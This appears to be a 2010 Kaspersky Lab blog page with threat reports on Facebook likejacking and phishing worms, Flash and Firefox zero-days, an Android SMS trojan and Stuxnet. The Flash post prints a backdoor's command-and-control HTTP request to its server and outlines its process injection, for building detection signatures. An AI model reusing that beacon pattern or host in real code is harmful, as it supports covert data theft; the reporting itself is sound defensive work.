The Internet threat alert status is currently normal. At present, no major epidemics or other serious incidents have been recorded by Kaspersky Lab’s monitoring service. Internet threat level: 1
Latest posting
By rating
By popularity

Join our blog

You can contribute to our blog if you have +100 points. Comment on articles and blogposts, and other users will rate your comments. You receive points for positive ratings.

Incidents|Disliking Facebook LikeJacking

Kurt Baumgartner
Kaspersky Lab Expert
Posted October 29, 16:15  GMT
Tags: Social Networks

Another Facebook likejacking attempt is being spammed out to fool Facebook users with "5 things girls do before she meets her boyfriend". Instead of presenting a video, the page redirects browsers to a "Like" button hosted on Facebook.

As illustrated above, tens of thousands of people have clicked on the link while they are logged into Facebook already. If you are one of the people who have already attempted to watch the video, please remove the "like" entry from your wall or newsfeed. Also, delete the liked page from your "Likes and Interests" section.

If you are using Facebook, be wary of what you click on. While this one may not be as serious an issue as some of the other Facebook scams we have seen, you probably don't want to provide this plugin developer with more demographic statistics of who falls for phony videos.

Even more interesting information falls out when you investigate a bit deeper. Attempting to access the "HTML source" results in an offer suggesting that you sell your fan pages to a suspicious email address, which is not recommended.
Comment      Link

Yesterday, Adobe published an advisory about a critical vulnerability in their Flash Player that is already being actively exploited. The CVE number assigned to this bug is CVE-2010-3654. A fix is currently being prepared by Adobe. The exploit we are seeing right now has a payload which, while not being very sophisticated, holds several surprises.

When executed, the bot checks for command line options. The '-installkys' option installs the bot onto the victim machine. Interestingly enough, if you use the '-removekys' parameter the malware gets entirely removed from the system – a built in unistall. The malware then calls itself without any parameters and the malicious code is run. The screenshot below shows the code for parsing the command line parameters.

The binary drops a DLL, the actual malware, to the hard drive and scans the list of running processes for outlook.exe, iexplore.exe, and firefox.exe. If a matching process is found, the dropped DLL gets injected and executed as a new thread.

The injected code will send an HTTP request to news.mysundayparty.com every 5 minutes and download an encrypted configuration file. The DNS entry seems to be somewhat fluxy: it has a TTL of 1800 seconds, and the IP address it resolves to changes every now and then. A decrypted config file contains a list of commands to gather information about the infected host. This information is encrypted and sent back to the server. Here is a decoded config file:

Searching the web for strings from this file reveals an interesting connection with a piece of malware that was spreading at the beginning of this year. Similar to the current bot, this earlier virus exploits a zero-day vulnerability, collects information about the infected machine and sends it back to its master. A still earlier version is reported to exploit another Flash zero-day.

A nice thing is that each configuration download request contains all the necessary information to track down infected hosts in a network. Below is what the HTTP GET request for the config file looks like. The path contains one parameter assembled from the Windows host name and its IP address with the prefix '-nsunday' and is quite unique. Also note the Referer field, which is always set to http://www.yahoo.com/, and the characteristic Accept header. Constructing a reliable IDS signature should not be too hard.

GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC- HTTP/1.1
Referer: http://www.yahoo.com/
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
  application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2009021910 Firefox/3.0.7
Host: news.mysundayparty.com
Cache-Control: no-cache

Kaspersky detects both the installer and the DLL as Backdoor.Win32.Sykipot.an. The exploit is heuristically detected as Exploit.Script.Generic.

Comment      Link

Research|Firefox Tricked - Current 0day

Kurt Baumgartner
Kaspersky Lab Expert
Posted October 27, 18:57  GMT
Tags: Firefox

Firefox (FF) users should be aware of a use-after-free vulnerability affecting Firefox versions 3.6.11 and earlier. The security team at Firefox has been working on getting a patch out since at least early Tuesday morning, delivering a v3.6.12 release candidate available for brave nightly build developers and testers last night.

A zero day exploit attacking this vulnerability was used at the compromised Nobel Peace Prize website to drop a trojan on unsuspecting visitors' systems, although the 0day was limited in that it did not implement well known ROP or JOP techniques (link to zipped pdf of VB2010 presentation slides) to effectively attack defensive technologies on newer Windows Vista and 7 platforms like DEP and ASLR. It effectively attacked newer FF on older versions of Windows.

To deal with this inadequacy, the attackers' javascript unusually checked for only newer versions of Firefox browsers and older versions of Windows. It only delivers the exploit code for those combinations. The writers must have felt rushed to get this exploit out.

Firefox users also can prevent attacks on the vulnerability by using the NoScript add-on or disabling javascript in their FF browser. Kaspersky Internet Security detects and prevents the exploit code as Exploit.JS.CVE-2010-3765.a.

UPDATE: Mozilla Firefox build 3.6.12 is out! In Firefox 3.6.11, you can click Help -> Check for updates... It includes the patch for msfa2010-73, "Heap buffer overflow mixing document.write and DOM insertion", a problem otherwise described as the previously posted "use after free". Readers interested in technical details of the vulnerability should check out the bug link previously posted above, the report "Interleaving document.write and appendChild can lead to duplicate text frames and overrunning of text run buffers" is now open to the public. Updating Firefox v3.6.11 takes under a minute, but requires a Firefox restart. The browser makes a best effort to restore any tabs that you may have had open at time of restart.

At this point, I suppose the dirty secret buried amongst the "FF 0day are rare!" hype is that the numbers of users hit with this stuff right now are extremely low, for both the Firefox exploit itself and the "Belmoo" trojan that was delivered with it. But now is not the time to be lackadaisical about patching or maintaining security software -- the exploit will predictably be enhanced with ROP (or other DEP/ASLR bypasses) and added to pages all over the web over the next couple of weeks and the following months. Dependent rss reader software is vulnerable too, so expect updates to those packages, and be aware that they run javascript and may be vulnerable.
Comment      Link

In this latest installment of the Lab Matters webcast, senior malware analyst Denis Maslennikov provides an inside look at the mobile threat landscape.

Maslennikov discusses the recent surge in SMS trojans targeting the Android platform, the use of search engine optimization techniques to spread mobile malware and the financial incentives involved.

He also talks about how attacks differ between mobile platforms and offer some startling predictions about what we'll see in the coming years.

Comment      Link

Events|Catching Facebook worms in Russia

David Jacoby
Kaspersky Lab Expert
Posted October 25, 14:56  GMT
Tags: Social Networks

Just another Sunday evening – I get to Moscow, check in and naturally go online to Facebook to inform everyone about how my trip went. Not very exciting, right? Wrong. A friend had ‘sent’ me a strange-looking link via Facebook IM. A closer look revealed that it was a link being spread by a new and active Facebook worm. The worm was stealing login credentials – and had already successfully stolen the credentials from thousands of people.

The worm spreads through Facebook instant messenger – just like many other Facebook worms. The message states the following: "Is this you?" followed by a link to the malicious Facebook app. The Facebook application is pretty simple; it loads new content into an iframe. The page which is loaded within the iframe is a simple phishing site: it asks for your Facebook credentials so that you can see some new content. Below is a screenshot of the login page:

I decided to investigate the phishing site a bit more, so I checked for some common directories on the server; directories which could contain more information about the worm and I found a directory which contained the Apache access logs. When analyzing the content of the log file I saw that someone was trying to access a file named acc.txt. I downloaded acc.txt and saw that the file contained stolen accounts: in the first version of acc.txt which I downloaded I saw that the attacker had collected over 3000 accounts! I downloaded the acc.txt at 5-minute intervals, and within 20 minutes, the number of stolen accounts went from 3000 to over 6000.

I immediately contacted the Facebook security team – who responded equally rapidly. The malicious page is down, and the Facebook team is going through their remediation routine.

This phishing attack was very simple and yet thousands of people fell for it!!! My guess is that there are lots of other similar attacks happening as I write this.

So... when you are logged on to Facebook, do NOT trust anything which is sent to you, especially not when it asks for your password or credit card information.

Comment      Link

Research|FakePlayer: take 3

Kaspersky Lab Expert
Posted October 13, 18:29  GMT
Tags: Mobile Malware

We have just detected a third FakePlayer SMS Trojan for Android phones – it’s been a month since we saw the second one. What’s new in this one?

First of all, the ‘porno player’ icon from the first variant has returned.

In the second place, this variant sends for-fee SMS/text messages to two short numbers now – 7132 as in the previous version and also 4161 - new for this version.

The cost for every SMS/text message remains 6 USD (about 170 Russian rubles).

There are no other changes. The same archive – pornplayer.apk, the same infection vector – via the Internet using SEO tricks and the same queries upon installation:

So no real changes – just a new variant to earn additional money… But the trend for regular updates is a concern.

PS Everyone with a phone which supports J2ME should also beware: if you go to a website which is spreading Trojan-SMS.AndroidOS.FakePlayer.c using a mobile web browser, such as Opera Mini for instance, you will be offered a link to download a J2ME application – which happens to be a Trojan we detect as Trojan.SMS.J2ME.Small.r.

Comment      Link

In this latest edition of our Lab Matters webcast, senior anti virus resercher Roel Schouwenberg discusses the intricacies of the mysterious Stuxnet worm attack.

In this Q&A with security evangelist Ryan Naraine, Schouwenberg provides valuable insight into Stuxnet's exploitation and propagation techniques, the use of multiple zero-day vulnerabilities, the security posture of ICS and SCADA systems and the possibility that this attack was financed and backed by a nation-state.

comments      Link

This year the Virus Bulleting Conference, one of the most prestigious annual events in the anti-virus industry, took place in Vancouver, Canada.

It was a special event for Kaspersky Lab since we had a record-breaking total of seven speakers: who covered the most interesting and hot topics such as mobile malware, on-line fraud and black markets, targeted attacks. Last, but not least, we were able to reveal some new details about Stuxnet in a joint presentation with Microsoft. The VB conference demonstrated again how important cooperation between researchers is. Between the joint work on Stuxnet and the Zeus-related arrests we saw how AV researchers from different countries; cultures and companies join forces to fight cyber crime and to make this world safer.

Every year the AV community gathers at VB - next year it will be in Barcelona, Spain and I hope we will also have good news to share again.

PS We will be posting the Kaspersky VB papers online over the next few days here http://www.kaspersky.com/VB_2010
Comment      Link